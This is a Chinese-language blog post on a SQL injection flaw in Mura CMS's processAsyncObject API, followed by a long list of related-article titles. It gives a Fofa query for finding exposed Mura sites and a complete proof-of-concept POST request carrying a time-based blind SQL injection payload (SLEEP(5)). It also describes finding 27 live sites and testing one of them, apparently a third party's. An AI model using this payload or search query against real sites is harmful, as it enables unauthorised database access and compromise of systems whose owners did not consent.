Mura CMS processAsyncObject SQL隱碼攻擊漏洞

LeouMaster發表於2024-05-14

漏洞描述

該漏洞允許攻擊者在某些API請求中注入惡意SQL程式碼，來訪問或修改資料庫資訊，甚至可能獲得對系統的完全控制，主要危害包括未授權訪問敏感資料以及可能對系統完整性造成的損害

Fofa: body="Powered by Mura CMS"

POC

POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded
 
object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1

漏洞復現

在fofa中搜尋資產，有27條資料

訪問其中一個站點進行抓包

使用sleep(5)進行判斷

使用sleep(10)進行判斷

Joomla CMS 3.2-3.4.4 SQL隱碼攻擊漏洞分析
2020-08-19
OOMSQL
Nacos Derby SQL隱碼攻擊漏洞
2024-06-27
SQL
Rails 3爆SQL隱碼攻擊漏洞
2012-06-05
AISQL
【網路安全】什麼是SQL隱碼攻擊漏洞?SQL隱碼攻擊的特點!
2021-09-06
SQL
PHP常見漏洞（1）–SQL隱碼攻擊
2017-11-08
PHPSQL
SQL隱碼攻擊
2024-07-02
SQL
如何做好防護SQL隱碼攻擊漏洞
2020-06-01
SQL
安全漏洞問題6：SQL隱碼攻擊
2017-11-21
SQL
WordPress SQL隱碼攻擊漏洞與提權分析
2015-08-25
SQL
修復SQL隱碼攻擊漏洞兩種方法
2011-03-16
SQL
SQL隱碼攻擊漏洞測試工具比較
2012-02-02
SQL
【SQL Server】--SQL隱碼攻擊
2015-01-31
SQLServer
反恐精英之動態SQL和SQL隱碼攻擊-SQL隱碼攻擊-SQL隱碼攻擊技術-語句注入
2014-02-16
SQL
反恐精英之動態SQL和SQL隱碼攻擊-SQL隱碼攻擊-SQL隱碼攻擊技術-語句修改
2014-02-16
SQL
齊博cms最新SQL隱碼攻擊網站漏洞可遠端執行程式碼提權
2018-10-25
SQL網站行程
MYSQL SQL隱碼攻擊
2021-11-20
MySql
【SQL隱碼攻擊原理】
2018-01-17
SQL
防止SQL隱碼攻擊
2010-04-20
SQL
SQL隱碼攻擊（一）
2009-12-14
SQL
SQL隱碼攻擊(pikachu)
2024-05-10
SQL
SQL隱碼攻擊方法
2024-07-08
SQL
反恐精英之動態SQL和SQL隱碼攻擊-SQL隱碼攻擊
2014-02-16
SQL
（轉）Discuz!X2.0SQL隱碼攻擊漏洞EXP
2017-11-15
SQL
反恐精英之動態SQL和SQL隱碼攻擊-SQL隱碼攻擊-防衛SQL隱碼攻擊-驗證檢查
2014-02-16
SQL
反恐精英之動態SQL和SQL隱碼攻擊-SQL隱碼攻擊-防衛SQL隱碼攻擊-繫結變數
2014-02-16
SQL變數
SQL隱碼攻擊原理是什麼?如何防範SQL隱碼攻擊？
2022-11-24
SQL
反恐精英之動態SQL和SQL隱碼攻擊-SQL隱碼攻擊-防衛SQL隱碼攻擊-顯式格式化模型
2014-02-16
SQL模型
反恐精英之動態SQL和SQL隱碼攻擊-SQL隱碼攻擊-SQL隱碼攻擊技術-資料型別轉換
2014-02-16
SQL資料型別
SQL隱碼攻擊式攻擊掃描器
2008-07-15
SQL
SQL隱碼攻擊語句
2018-07-25
SQL
pikachu-SQL隱碼攻擊
2020-11-21
SQL
SQL隱碼攻擊導圖
2018-06-15
SQL
SQL隱碼攻擊問題
2017-03-30
SQL
SQL隱碼攻擊的例子
2017-03-13
SQL
ZMLCMS-SQL隱碼攻擊
2017-08-20
SQL
SQL隱碼攻擊演練
2013-09-16
SQL
預防SQL隱碼攻擊
2010-04-02
SQL
SQL隱碼攻擊總結
2024-08-31
SQL

Mura CMS processAsyncObject SQL隱碼攻擊漏洞

漏洞描述

Fofa: body="Powered by Mura CMS"

POC

漏洞復現

相關文章